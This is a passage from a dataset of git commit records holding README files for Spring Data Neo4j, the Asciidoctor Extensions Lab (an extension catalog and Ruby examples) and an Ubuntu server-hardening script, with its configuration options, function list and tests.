repository\n\n== Getting Help\n\nThis README and the http:\/\/static.springsource.org\/spring-data\/data-neo4j\/docs\/current\/reference\/html\/[Reference Manual] are the best places to start learning about Spring Data Neo4j 4.\n\nThe main http:\/\/projects.spring.io.org\/spring-data-neo4j[SpringSource project site] contains links to basic project information such as source code, JavaDocs, Issue tracking, etc.\n\nFor more detailed questions, use the \"forum\":http:\/\/forum.springsource.org\/forumdisplay.php?f=80. If you are new to Spring as well as to Spring Data, look for information about \"Spring projects\":http:\/\/www.springsource.org\/projects.\n\n\nYou will also find help on http:\/\/stackoverflow.com\/questions\/tagged\/spring-data-neo4j[StackOverflow]\n\n== Contributing to Spring Data Neo4j\n\nThere are dedicated, mandatory https:\/\/github.com\/spring-projects\/spring-data-build\/blob\/master\/CONTRIBUTING.adoc[contribution guidelines] for all Spring Data projects.\n\nHere are some ways for you to get involved in the community:\n\n* Get involved with Spring Data Neo4j community on the http:\/\/groups.google.com\/group\/neo4j[Neo4j Google Group] and by helping on http:\/\/stackoverflow.com\/questions\/tagged\/spring-data-neo4j[StackOverflow].\n* Create https:\/\/jira.springframework.org\/browse\/DATAGRAPH[JIRA] tickets for bugs and new features and comment and vote on the ones that you are interested in.\n* Github is for social coding: if you want to write code, we encourage contributions through *pull requests* from a fork of this repository.\n If you want to contribute code this way, please read the https:\/\/github.com\/spring-projects\/spring-data-build\/blob\/master\/CONTRIBUTING.adoc[contribution guidelines] for details.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f27ccd92a714e0a48c9bd86048a0388c037fafda","subject":"README copyedits","message":"README copyedits\n","repos":"taky\/asciidoctor-extensions-lab,taky\/asciidoctor-extensions-lab,taky\/asciidoctor-extensions-lab","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Asciidoctor Extensions Lab\n:idprefix:\n:idseparator: -\n:toc: preamble\n\nA repository of sample and incubating Ruby-based extensions for Asciidoctor.\n\nIf you simply want to use the extensions in 
this repository, skip ahead to <<using-an-extension>>.\nTo create your own extension, we recommend that you first read the http:\/\/asciidoctor.org\/docs\/user-manual\/#extensions[extensions section] in the Asciidoctor user manual.\n\n== Extension types\n\nWe have the following types of extensions in the lab:\n\n- *Preprocessor* - processes the AsciiDoc source before it is parsed\n- *IncludeProcessor* - intercepts the AsciiDoc include directive\n- *Treeprocessor* - processes the parsed AsciiDoc document (AST)\n- *Postprocessor* - processes the converted output before it is written to the output stream (or disk)\n- *BlockProcessor* - adds a custom delimited block\n- *BlockMacroProcessor* - adds a custom block macro\n- *InlineMacroProcessor* - adds a custom inline macro\n\nThe type of extension (e.g., `-block-macro`) is always used in the name of the extension registration file and directory to make it easy to distinguish.\nYou can also look for examples using `git grep`.\nFor example, to look for a `BlockMacroProcessor`, run the following command:\n\n $ git grep BlockMacroProcessor lib\/\n\nYou'll get a result like this:\n\n....\nlib\/chart-block-macro\/extension.rb:class ChartBlockMacro < Extensions::BlockMacroProcessor\nlib\/gist-block-macro\/extension.rb:class GistBlockMacro < Extensions::BlockMacroProcessor\nlib\/pass-block-macro\/extension.rb:class PassBlockMacro < Extensions::BlockMacroProcessor\nlib\/tree-block-macro\/extension.rb:class TreeBlockMacro < Asciidoctor::Extensions::BlockMacroProcessor\n....\n\n== Extension files\n\nEach extension consists of several files:\n\n- A file that registers the extension (sometimes also contains the extension)\n- A file with the extension itself (when not defined in the registration file)\n- A file with sample AsciiDoc source to use to test the extension\n- Auxiliary assets needed by the extension\n\nFor example, the emoji-inline-macro extension has four files:\n\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro.rb[lib\/emoji-inline-macro.rb] (registration file)\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro\/extension.rb[lib\/emoji-inline-macro\/extension.rb] (extension file)\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro\/sample.adoc[lib\/emoji-inline-macro\/sample.adoc] (sample AsciiDoc file)\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro\/twemoji-awesome.css[lib\/emoji-inline-macro\/twemoji-awesome.css] (auxiliary asset file)\n\nNOTE: The registration file (e.g., emoji-inline-macro.rb) goes in the [path]_lib_ directory whereas the remaining files go inside a directory whose base name matches the name of the registration file (e.g., emoji-inline-macro).\n\n== Extension catalog\n\nThe following extensions are available in the lab.\n\nChartBlockMacro, link:lib\/chart-block-macro.rb[]::\nAdds a chart block and block macro to AsciiDoc powered by c3js, chartist or chartjs.\n\nChromeInlineMacro, link:lib\/chrome-inline-macro.rb[]::\nAdds an inline macro for linking to a `chrome:\/\/` URI.\n\nCopyrightFooterPostprocessor, link:lib\/copyright-footer-postprocessor.rb[]::\nAdds a copyright to the document footer based on the value of the `copyright` attribute.\n\nEmojiInlineMacro, link:lib\/emoji-inline-macro.rb[]::\nAdds an emoji inline macro for inserting emoji by name.\n\nFrontMatterPreprocessor, 
link:lib\/front-matter-preprocessor.rb[]::\nEmulates the built-in behavior of Asciidoctor to sweep away YAML front matter into the `front-matter` attribute.\n\nGistBlockMacro, link:lib\/gist-block-macro.rb[]::\nAdds a block macro to embed a gist into an AsciiDoc document.\n\nGoogleAnalyticsPostprocessor, link:lib\/google-analytics-postprocessor.rb[]::\nAdds the Google Analytics code for the account identified by the `google-analytics-account` attribute to the end of the HTML document.\n\nHardbreaksPreprocessor, link:lib\/hardbreaks-preprocessor.rb[]::\nAdds hardbreaks to the end of all non-empty lines that aren't section titles.\n\nImplicitApidocInlineMacro, link:lib\/implicit-apidoc-inline-macro.rb[]::\nAdds an inline macro for linking to the Javadoc of a class in the Java EE API.\n\nLicenseUrlDocinfoProcessor, link:lib\/license-url-docinfoprocessor.rb[]::\nAdds a link to the license specified by the `license` attribute to the document header.\n\nManInlineMacro, link:lib\/man-inline-macro.rb[]::\nAdds an inline macro for linking to another man page (used in the Git documentation).\n\nMathematicalTreeprocessor, link:lib\/mathematical-treeprocessor.rb[]::\nConverts all latexmath blocks to SVG using the Mathematical library.\n\nMathoidTreeprocessor, link:lib\/mathoid-treeprocessor.rb[]::\nConverts all stem blocks to SVG using MathJax via the Mathoid library.\n\nMentionsInlineMacro, link:lib\/mentions-inline-macro.rb[]::\nDetects Twitter-style username mentions and converts them to links.\n\nPassBlockMacro, link:lib\/pass-block-macro.rb[]::\nAdds a pass block macro to AsciiDoc.\n\nPickInlineMacro, link:lib\/pick-inline-macro.rb[]::\nAdds an inline macro for selecting between two values based on the value of another attribute.\n\nPullquoteInlineMacro, link:lib\/pullquote-inline-macro.rb[]::\nAdds an inline macro to pull a quote out of the flow and display it in a sidebar.\n\nSectnumoffsetTreeprocessor, link:lib\/sectnumoffset-treeprocessor.rb[]::\nIncrements all level-1 section numbers (and subsequently all subsections) by the value of the `sectnumoffset` attribute.\n\nShellSessionTreeprocessor, link:lib\/shell-session-treeprocessor.rb[]::\nDetects a shell command and trailing output and styles it for display in HTML.\n\nShoutBlock, link:lib\/shout-block.rb[]::\nConverts all text inside a delimited block named `shout` to uppercase and adds trailing exclamation marks.\n\nShowCommentsPreprocessor, link:lib\/showcomments-preprocessor.rb[]::\nConverts line comments to visual elements (normally dropped).\n\nSlimBlock, link:lib\/slim-block.rb[]::\nPasses the content in blocks named `slim` to the Slim template engine for processing.\n\nStepsPostprocessor, link:lib\/steps-postprocessor.rb[]::\nStyles an ordered list as a procedure list.\n\nTexPreprocessor, link:lib\/tex-preprocessor.rb[]::\nInterprets tex markup embedded inside of AsciiDoc.\n\nTextqlBlock, link:lib\/textql-block.rb[]::\nAdds a block for using textql to process data in an AsciiDoc document.\n\nTreeBlockMacro, link:lib\/tree-block-macro.rb[]::\nAdds a block macro to show the output of the `tree` command.\n\nUndoReplacementsPostprocessor, link:lib\/undo-replacements-postprocessor.rb[]::\nReverses the text replacements that are performed by Asciidoctor.\n\nUriIncludeProcessor, link:lib\/uri-include-processor.rb[]::\nEmulates the built-in behavior of Asciidoctor to include content from a URI.\n\nViewResultPostprocessor, link:lib\/view-result-postprocessor.rb[]::\nAdds an interactive toggle to block content marked as a view 
result.\n\nWhitespaceIncludeProcessor, link:lib\/whitespace-include-processor.rb[]::\nAn include processor that substitutes tabs with spaces (naively) in included source code.\n\nXmlEntityPostprocessor, link:lib\/xml-entity-postprocessor.rb[]::\nConverts named entities to character entities so they can be resolved without the use of external entity declarations.\n\n\/\/^\n\n== Using an extension\n\nBefore creating your own extensions, it would be wise to run one yourself.\nFirst, make sure Asciidoctor is installed:\n\n $ gem install asciidoctor\n\nNext, run the extension from the root directory of the project:\n\n $ asciidoctor -r lib\/emoji-inline-macro.rb lib\/emoji-inline-macro\/sample.adoc\n # asciidoctor: FAILED: 'lib\/emoji-inline-macro.rb' could not be loaded\n # Use --trace for backtrace\n\nOops!\nWe forgot to include the leading `.\/` when using the `-r` flag.\nLet's try again:\n\n $ asciidoctor -r .\/lib\/emoji-inline-macro.rb lib\/emoji-inline-macro\/sample.adoc\n\nAll right, it ran!\nThe output file, [path]_sample.html_, was created in the same directory as the source file, [path]_sample.adoc_.\n\nThe relevant bits of the input and output are shown below.\n\n._lib\/emoji-inline-macro\/sample.adoc_\n```asciidoc\nFaster than a emoji:turtle[1x]!\n\nThis is an example of how you can emoji:heart[lg] Asciidoctor and Twitter Emoji.\n```\n\n._lib\/emoji-inline-macro\/sample.html_\n```html\n<div class=\"paragraph\">\n<p>Faster than a <i class=\"twa twa-1x twa-turtle\"><\/i>!<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>This is an example of how you can <i class=\"twa twa-lg twa-heart\"><\/i> Asciidoctor and Twitter Emoji.<\/p>\n<\/div>\n```\n\nWARNING: Certain extensions require additional libraries.\nPlease consult the extension's registration file for details about what is required to use it.\n\n== Adding an extension\n\nYou can find examples of various ways to define an extension in the link:lib\/shout-block.rb[] extension.\n\n=== Shorthand (DSL)\n\nIf you're creating a trivial extension, you can define the extension using the extension DSL directly in the registration file.\nCreate a new file in the [path]_lib_ directory.\nInclude the extension type in the name of the file so it's clear to others what type of extension it is.\n\n._lib\/sample-block.rb_\n```ruby\nrequire 'asciidoctor\/extensions' unless RUBY_ENGINE == 'opal'\n\ninclude Asciidoctor\n\nExtensions.register do\n block do\n named :sample\n on_context :open\n\n process do |parent, reader, attrs|\n create_paragraph parent, reader.lines, attrs\n end\n end\nend\n```\n\nTIP: The `include Asciidoctor` line allows you to use classes from Asciidoctor without the `Asciidoctor::` prefix.\n\n=== Formal\n\nIf you're creating a more complex extension or want to enable reuse, you're encouraged to move the extension code to the [path]_extension.rb_ inside a directory with the same base name as the registration file.\nIn the case of a block, block macro or inline macro, this enables you to register the extension multiple times.\n\n._lib\/sample-block.rb_\n```ruby\nRUBY_ENGINE == 'opal' ? 
(require 'sample-block\/extension') : (require_relative 'sample-block\/extension')\n\nExtensions.register do\n block SampleBlock\nend\n```\n\n._lib\/sample-block\/extension.rb_\n```ruby\nclass SampleBlock < Extensions::BlockProcessor\n use_dsl\n named :sample\n on_context :open\n\n def process parent, reader, attrs\n create_paragraph parent, reader.lines, attrs\n end\nend\n```\n\nIt's customary to provide a sample AsciiDoc file named [path]_sample.adoc_ inside the extension subdirectory that others can use to try the extension.\nYou should also add your extension to the <<extension-catalog>> section along with a short description of what it does.\n\n== Other extensions\n\nSee http:\/\/asciidoctor.org\/docs\/extensions\/[this list] of extensions for Asciidoctor.\n\n\/\/\/\/\n== Transpiling extensions for Asciidoctor.js\n\nhttps:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/issues\/44[TODO].\n\/\/\/\/\n","old_contents":"= Asciidoctor Extensions Lab\n:idprefix:\n:idseparator: -\n:toc: preamble\n\nA repository of sample and incubating Ruby-based extensions for Asciidoctor.\n\nIf you just want to use the extensions here, skip ahead to <<using-an-extension>>.\nTo create your own extension, we recommend that you first read the http:\/\/asciidoctor.org\/docs\/user-manual\/#extensions[extensions section] in the Asciidoctor user manual.\n\n== Extension types\n\nWe have these types of extensions in the lab:\n\n- *Preprocessor* - processes the AsciiDoc source before it is parsed\n- *IncludeProcessor* - intercepts the AsciiDoc include directive\n- *Treeprocessor* - processes the parsed AsciiDoc document (AST)\n- *Postprocessor* - processes the converted output before it is written to the output stream (or disk)\n- *BlockProcessor* - adds a custom delimited block\n- *BlockMacroProcessor* - adds a custom block macro\n- *InlineMacroProcessor* - adds a custom inline macro\n\nThe type of extension (e.g, `-block-macro`) is always used in the name of the extension load file and directory to make it easy to distinguish.\nYou can also look for examples using `git grep`.\nFor example, to look for a `BlockMacroProcessor`, run the following command:\n\n $ git grep BlockMacroProcessor lib\/\n\nYou will get a result like this:\n\n....\nlib\/chart-block-macro\/extension.rb:class ChartBlockMacro < Extensions::BlockMacroProcessor\nlib\/gist-block-macro\/extension.rb:class GistBlockMacro < Extensions::BlockMacroProcessor\nlib\/pass-block-macro\/extension.rb:class PassBlockMacro < Extensions::BlockMacroProcessor\nlib\/tree-block-macro\/extension.rb:class TreeBlockMacro < Asciidoctor::Extensions::BlockMacroProcessor\n....\n\n== Extension files\n\nEach extension consists of several files:\n\n- A file that registers the extension (sometimes also contains the extension)\n- A file with the extension itself (when not defined in the registration file)\n- A file with sample AsciiDoc source to use to test the section\n- Auxiliary assets needed by the extension\n\nFor example, the emoji-inline-macro extension has four files:\n\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro.rb[lib\/emoji-inline-macro.rb] (registration file)\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro\/extension.rb[lib\/emoji-inline-macro\/extension.rb] (extension file)\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro\/sample.adoc[lib\/emoji-inline-macro\/sample.adoc] (sample AsciiDoc 
file)\n- https:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/blob\/master\/lib\/emoji-inline-macro\/twemoji-awesome.css[lib\/emoji-inline-macro\/twemoji-awesome.css] (auxiliary asset file)\n\nNOTE: The registration file (e.g., emoji-inline-macro.rb) goes in the [path]_lib_ directory whereas the remaining files go inside a directory whose base name matches the name of the registration file (e.g., emoji-inline-macro).\n\n== Extension catalog\n\nThe following extensions are available in the lab.\n\nChartBlockMacro, link:lib\/chart-block-macro.rb[]::\nAdds a chart block and block macro to AsciiDoc powered by c3js, chartist or chartjs.\n\nChromeInlineMacro, link:lib\/chrome-inline-macro.rb[]::\nAdds an inline macro for linking to a `chrome:\/\/` URI.\n\nCopyrightFooterPostprocessor, link:lib\/copyright-footer-postprocessor.rb[]::\nAdds a copyright to the document footer based on the value of the `copyright` attribute.\n\nEmojiInlineMacro, link:lib\/emoji-inline-macro.rb[]::\nAdds an emoji inline macro for inserting emoji by name.\n\nFrontMatterPreprocessor, link:lib\/front-matter-preprocessor.rb[]::\nEmulates the built-in behavior of Asciidoctor to sweep away YAML front matter into the `front-matter` attribute.\n\nGistBlockMacro, link:lib\/gist-block-macro.rb[]::\nAdds a block macro to embed a gist into an AsciiDoc document.\n\nGoogleAnalyticsPostprocessor, link:lib\/google-analytics-postprocessor.rb[]::\nAdds the Google Analytics code for the account identified by the `google-analytics-account` attribute to the end of the HTML document.\n\nHardbreaksPreprocessor, link:lib\/hardbreaks-preprocessor.rb[]::\nAdds hardbreaks to the end of all non-empty lines that aren't section titles.\n\nImplicitApidocInlineMacro, link:lib\/implicit-apidoc-inline-macro.rb[]::\nAdds an inline macro for linking to the Javadoc of a class in the Java EE API.\n\nLicenseUrlDocinfoProcessor, link:lib\/license-url-docinfoprocessor.rb[]::\nAdds a link to the license specified by the `license` attribute to the document header.\n\nManInlineMacro, link:lib\/man-inline-macro.rb[]::\nAdds an inline macro for linking to another man page (used in the Git documentation).\n\nMathematicalTreeprocessor, link:lib\/mathematical-treeprocessor.rb[]::\nConverts all latexmath blocks to SVG using the Mathematical library.\n\nMathoidTreeprocessor, link:lib\/mathoid-treeprocessor.rb[]::\nConverts all stem blocks to SVG using MathJax via the Mathoid library.\n\nMentionsInlineMacro, link:lib\/mentions-inline-macro.rb[]::\nDetects Twitter-style username mentions and converts them to links.\n\nPassBlockMacro, link:lib\/pass-block-macro.rb[]::\nAdds a pass block macro to AsciiDoc.\n\nPickInlineMacro, link:lib\/pick-inline-macro.rb[]::\nAdds an inline macro for selecting between two values based on the value of another attribute.\n\nPullquoteInlineMacro, link:lib\/pullquote-inline-macro.rb[]::\nAdds an inline macro to pull a quote out of the flow and display it in a sidebar.\n\nSectnumoffsetTreeprocessor, link:lib\/sectnumoffset-treeprocessor.rb[]::\nIncrements all level-1 section numbers (and subsequently all subsections) by the value of the `sectnumoffset` attribute.\n\nShellSessionTreeprocessor, link:lib\/shell-session-treeprocessor.rb[]::\nDetects a shell command and trailing output and styles it for display in HTML.\n\nShoutBlock, link:lib\/shout-block.rb[]::\nConverts all text inside a delimited block named `shout` to uppercase and adds trailing exclamation marks.\n\nShowCommentsPreprocessor, 
link:lib\/showcomments-preprocessor.rb[]::\nConverts line comments to visual elements (normally dropped).\n\nSlimBlock, link:lib\/slim-block.rb[]::\nPasses the content in blocks named `slim` to the Slim template engine for processing.\n\nStepsPostprocessor, link:lib\/steps-postprocessor.rb[]::\nStyles an ordered list as a procedure list.\n\nTexPreprocessor, link:lib\/tex-preprocessor.rb[]::\nInterprets tex markup embedded inside of AsciiDoc.\n\nTextqlBlock, link:lib\/textql-block.rb[]::\nAdds a block for using textql to process data in an AsciiDoc document.\n\nTreeBlockMacro, link:lib\/tree-block-macro.rb[]::\nAdds a block macro to show the output of the `tree` command.\n\nUndoReplacementsPostprocessor, link:lib\/undo-replacements-postprocessor.rb[]::\nReverses the text replacements that are performed by Asciidoctor.\n\nUriIncludeProcessor, link:lib\/uri-include-processor.rb[]::\nEmulates the built-in behavior of Asciidoctor to include content from a URI.\n\nViewResultPostprocessor, link:lib\/view-result-postprocessor.rb[]::\nAdds an interactive toggle to block content marked as a view result.\n\nWhitespaceIncludeProcessor, link:lib\/whitespace-include-processor.rb[]::\nAn include processor that substitutes tabs with spaces (naively) in included source code.\n\nXmlEntityPostprocessor, link:lib\/xml-entity-postprocessor.rb[]::\nConverts named entities to character entities so they can be resolved without the use of external entity declarations.\n\n\/\/^\n\n== Using an extension\n\nBefore create your own extensions, it would be wise to run one yourself.\nFirst, make sure Asciidoctor is installed:\n\n $ gem install asciidoctor\n\nNext, we'll run an extension from the root directory of the project:\n\n $ asciidoctor -r lib\/emoji-inline-macro.rb lib\/emoji-inline-macro\/sample.adoc\n # asciidoctor: FAILED: 'lib\/emoji-inline-macro.rb' could not be loaded\n # Use --trace for backtrace\n\nOops!\nWe forgot to include the leading `.\/` when using the `-r` flag\nLet's try again:\n\n $ asciidoctor -r .\/lib\/emoji-inline-macro.rb lib\/emoji-inline-macro\/sample.adoc\n\nAll right, it ran!\nThe output file, [path]_sample.html_, was created in the same directory as the source file, [path]_sample.adoc_.\n\nThe relevant bits of the input and output are show below.\n\n._lib\/emoji-inline-macro\/sample.adoc_\n```asciidoc\nFaster than a emoji:turtle[1x]!\n\nThis is an example of how you can emoji:heart[lg] Asciidoctor and Twitter Emoji.\n```\n\n._lib\/emoji-inline-macro\/sample.html_\n```html\n<div class=\"paragraph\">\n<p>Faster than a <i class=\"twa twa-1x twa-turtle\"><\/i>!<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>This is an example of how you can <i class=\"twa twa-lg twa-heart\"><\/i> Asciidoctor and Twitter Emoji.<\/p>\n<\/div>\n```\n\nWARNING: Certain extensions require additional libraries.\nPlease consult the registration file for the extension for details about what is required to use it.\n\n== Adding an extension\n\nYou can find examples of various ways to define an extension in the link:lib\/shout-block.rb[] extension.\n\n=== Shorthand (DSL)\n\nIf you're creating a trivial extension, you can define the extension using the extension DSL directly in the registration file.\nCreate a new file in the [path]_lib_ directory.\nInclude the extension type in the name of the file so others are clear what type of extension it is.\n\n._lib\/sample-block.rb_\n```ruby\nrequire 'asciidoctor\/extensions' unless RUBY_ENGINE == 'opal'\n\ninclude Asciidoctor\n\nExtensions.register do\n block do\n named 
:sample\n on_context :open\n\n process do |parent, reader, attrs|\n create_paragraph parent, reader.lines, attrs\n end\n end\nend\n```\n\nTIP: The `include Asciidoctor` line allows you to use classes from Asciidoctor without the `Asciidoctor::` prefix.\n\n=== Formal\n\nIf you are creating a more complex extension or want to enable reuse, you are encouraged to move the extension code to the [path]_extension.rb_ inside a directory with the same base name as the registration file.\nIn the case of a block, block macro or inline macro extension, this enables you to register it multiple times.\n\n._lib\/sample-block.rb_\n```ruby\nRUBY_ENGINE == 'opal' ? (require 'sample-block\/extension') : (require_relative 'sample-block\/extension')\n\nExtensions.register do\n block SampleBlock\nend\n```\n\n._lib\/sample-block\/extensions.rb_\n```ruby\nclass SampleBlock < Extensions::BlockProcessor\n use_dsl\n named :sample\n on_context :open\n\n def process parent, reader, attrs\n create_paragraph parent, reader.lines, attrs\n end\nend\n```\n\nIt's customary to provide a sample AsciiDoc file named [path]_sample.adoc_ inside the extension subdirectory that others can use to test the extension.\nYou should also add your extension to the <<extension-catalog>> section along with a short description of what it does.\n\n== Other extensions\n\nSee http:\/\/asciidoctor.org\/docs\/extensions\/[this list] of extensions for Asciidoctor.\n\n\/\/\/\/\n== Transpiling extensions for Asciidoctor.js\n\nhttps:\/\/github.com\/asciidoctor\/asciidoctor-extensions-lab\/issues\/44[TODO].\n\/\/\/\/\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"26280ab823a17130be58164da7e0194b7edf5bf7","subject":"mention Zapus","message":"mention Zapus\n\nSigned-off-by: Thomas Sj\u00f6gren <9ff28d1cb1d19283ed3327b40df6c7d62d8bc343@users.noreply.github.com>\n","repos":"konstruktoid\/hardening,konstruktoid\/hardening","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Hardening Ubuntu. Systemd edition.\n:icons: font\n\nA quick way to make an Ubuntu server a bit more secure.\n\nTested on `15.10 Ubuntu Wily Werewolf`, `16.04 Xenial Xerus`, `16.10 Yakkety Yak` and `17.04 Zesty Zapus (development branch)`. +\nSystemd required.\n\nIf you're just interested in the security-focused systemd configuration, it's available as a link:systemd.adoc[separate document]. +\nIf you're interested in testing your host settings, you'll find the link:README.adoc#tests[instructions here]. +\nIf you're using Ansible, a playbook with most of the above functions implemented is available in my Ansible repository https:\/\/github.com\/konstruktoid\/Ansible[konstruktoid\/Ansible].\n\nNOTE: This is a constant work in progress. Make sure you understand what it does. Read the code.\n\n== Howto\nStart the installation of the server. +\nPick language, keyboard layout, timezone and so on as you usually would.\n\n=== Partition the system\n[source,shell]\n----\n\/\n\/boot (rw)\n\/home (rw,nosuid,nodev)\nswap\n\/var\n\/var\/log (rw,nosuid,nodev,noexec)\n\/var\/log\/audit (rw,nosuid,nodev,noexec)\n----\n\nNote that `\/tmp` and `\/var\/tmp` will be added automatically by the script.\n\n=== Login, set a Grub2 password, configure and run ubuntu.sh\nDo not add any packages. +\nLog in. +\nSelect a Grub2 password (using `grub-mkpasswd-pbkdf2`). +\nDownload the script using `git clone https:\/\/github.com\/konstruktoid\/hardening.git`. 
+\nChange the configuration options in the `ubuntu.cfg` file and last but not least run the script, `sudo bash ubuntu.sh`. +\n\n== Configuration options\n[source,shell]\n----\nFW_ADMIN='127.0.0.1' \/\/ <1>\nSSH_GRPS='sudo' \/\/ <2>\nSYSCTL_CONF='https:\/\/raw.githubusercontent.com\/konstruktoid\/hardening\/master\/misc\/sysctl.conf' \/\/ <3>\nAUDITD_RULES='https:\/\/raw.githubusercontent.com\/konstruktoid\/hardening\/master\/misc\/audit.rules' \/\/ <4>\nLOGROTATE_CONF='https:\/\/raw.githubusercontent.com\/konstruktoid\/hardening\/master\/misc\/logrotate.conf' \/\/ <5>\nNTPSERVERPOOL='0.ubuntu.pool.ntp.org 1.ubuntu.pool.ntp.org 2.ubuntu.pool.ntp.org 3.ubuntu.pool.ntp.org pool.ntp.org' \/\/ <6>\nVERBOSE='N' \/\/ <7>\nCHANGEME='' \/\/ <8>\n\n# Configuration files\nADDUSER='\/etc\/adduser.conf'\nAUDITDCONF='\/etc\/audit\/auditd.conf'\nAUDITRULES='\/etc\/audit\/rules.d\/hardening.rules'\nCOMMONPASSWD='\/etc\/pam.d\/common-password'\nCOMMONACCOUNT='\/etc\/pam.d\/common-account'\nCOMMONAUTH='\/etc\/pam.d\/common-auth'\nDEFAULTGRUB='\/etc\/default\/grub'\nDISABLEMNT='\/etc\/modprobe.d\/disablemnt.conf'\nDISABLEMOD='\/etc\/modprobe.d\/disablemod.conf'\nDISABLENET='\/etc\/modprobe.d\/disablenet.conf'\nJOURNALDCONF='\/etc\/systemd\/journald.conf'\nLIMITSCONF='\/etc\/security\/limits.conf'\nLOGINDCONF='\/etc\/systemd\/logind.conf'\nLOGINDEFS='\/etc\/login.defs'\nLOGROTATE='\/etc\/logrotate.conf'\nPAMLOGIN='\/etc\/pam.d\/login'\nRESOLVEDCONF='\/etc\/systemd\/resolved.conf'\nRKHUNTERCONF='\/etc\/default\/rkhunter'\nSECURITYACCESS='\/etc\/security\/access.conf'\nSSHDFILE='\/etc\/ssh\/sshd_config'\nSYSCTL='\/etc\/sysctl.conf'\nSYSTEMCONF='\/etc\/systemd\/system.conf'\nTIMESYNCD='\/etc\/systemd\/timesyncd.conf'\nUFWDEFAULT='\/etc\/default\/ufw'\nUSERADD='\/etc\/default\/useradd'\nUSERCONF='\/etc\/systemd\/user.conf'\n----\n<1> The IP addresses that will be able to connect with SSH.\n<2> Which group the users have to be a member of in order to access via SSH.\n<3> Stricter sysctl settings.\n<4> Auditd rules.\n<5> Logrotate settings.\n<6> NTP server pool.\n<7> Whether you want all the details or not.\n<8> Add something just to verify that you actually glanced at the code.\n\n=== Function list\n`pre` Script setup +\n`firewall` Enable ufw and allow port 22 from `$FW_ADMIN` +\n`disablenet` Disable misc network protocols +\n`disablemnt` Disable misc file systems +\n`disablemod` Disable misc kernel modules +\n`resolvedconf` Systemd\/resolved.conf +\n`systemdconf` Systemd\/system.conf and Systemd\/user.conf +\n`journalctl` Systemd\/journald.conf and logrotate.conf +\n`timesyncd` Systemd\/timesyncd.conf +\n`coredump` Systemd\/coredump.conf +\n`fstab` \/etc\/fstab, system\/tmp.mount and system\/var-tmp.mount +\n`prelink` Prelink +\n`aptget` Updating the package index and upgrading installed packages +\n`hosts` \/etc\/hosts.allow and \/etc\/hosts.deny +\n`issue` Add message to \/etc\/issue, \/etc\/issue.net, \/etc\/motd +\n`logindefs` \/etc\/login.defs +\n`logindconf` Systemd\/logind.conf +\n`sysctl` \/etc\/sysctl.conf +\n`limitsconf` \/etc\/security\/limits.conf +\n`adduser` \/etc\/adduser.conf and \/etc\/default\/useradd +\n`rootaccess` \/etc\/security\/access.conf and \/etc\/securetty +\n`packages` Installing base packages +\n`apport` Disable apport +\n`rkhunter` Configures rkhunter +\n`sshdconfig` \/etc\/ssh\/sshd_config +\n`password` \/etc\/pam.d\/common-password and \/etc\/pam.d\/common-auth +\n`cron` \/etc\/cron and \/etc\/at +\n`ctrlaltdel` Ctrl-alt-delete +\n`auditd` Auditd +\n`aide` Aide +\n`rhosts` .rhosts 
+\n`users` Remove users +\n`lockroot` Lock root user account +\n`aptget_clean` Remove unused packages +\n`suid` Remove suid bits +\n`umask` Set umask +\n`path` Modify paths +\n`aa_enforce` Enforce apparmor profiles +\n`aide_post` Create Aide db +\n`aide_timer` Enable daily Aide check +\n`systemddelta` systemd-delta +\n`checkreboot` Check if reboot is required\n\n== Tests\nThere are approximately 275 https:\/\/github.com\/sstephenson\/bats[Bats tests] for most of the above settings available in the link:tests\/[tests directory].\n\n[source,shell]\n----\ngit clone https:\/\/github.com\/konstruktoid\/hardening.git\ncd tests\/\nsudo bats .\n----\n\n== Recommended reading\nhttps:\/\/benchmarks.cisecurity.org\/downloads\/show-single\/index.cfm?file=independentlinux.100[CIS Distribution Independent Linux Benchmark v1.0.0] +\nhttp:\/\/iase.disa.mil\/stigs\/os\/unix-linux\/Pages\/index.aspx[Draft Red Hat 7 STIG Version 1, Release 0.1] +\nhttps:\/\/benchmarks.cisecurity.org\/downloads\/show-single\/?file=ubuntu1404.100[CIS Ubuntu 14.04 LTS Server Benchmark v1.0.0] +\nhttps:\/\/wiki.ubuntu.com\/Security\/Features +\nhttps:\/\/help.ubuntu.com\/community\/StricterDefaults +\n\n","old_contents":"= Hardening Ubuntu. Systemd edition.\n:icons: font\n\nA quick way to make a Ubuntu server a bit more secure.\n\nTested on `15.10 Ubuntu Wily Werewolf`, `16.04 Xenial Xerus` and `16.10 Yakkety Yak`. +\nSystemd required.\n\nIf you're just interested in the security focused systemd configuration, it's available as a link:systemd.adoc[separate document]. +\nIf you're interested in testing your host settings, you'll find the link:README.adoc#tests[instructions here]. +\nIf you're using Ansible, a playbook with most of the above functions implemented is available in my Ansible repository https:\/\/github.com\/konstruktoid\/Ansible[konstruktoid\/Ansible].\n\nNOTE: This is a constant work in progress. Make sure you understand what it does. Read the code.\n\n== Howto\nStart the installation of the server. +\nPick language, keyboard layout, timezone and so on as you usually would.\n\n=== Partition the system\n[source,shell]\n----\n\/\n\/boot (rw)\n\/home (rw,nosuid,nodev)\nswap\n\/var\n\/var\/log (rw,nosuid,nodev,noexec)\n\/var\/log\/audit (rw,nosuid,nodev,noexec)\n----\n\nNote that `\/tmp` and `\/var\/tmp` will be added automatically by the script.\n\n=== Login, set a Grub2 password, configure and run ubuntu.sh\nDo not add any packages. +\nLog in. +\nSelect a Grub2 password (using 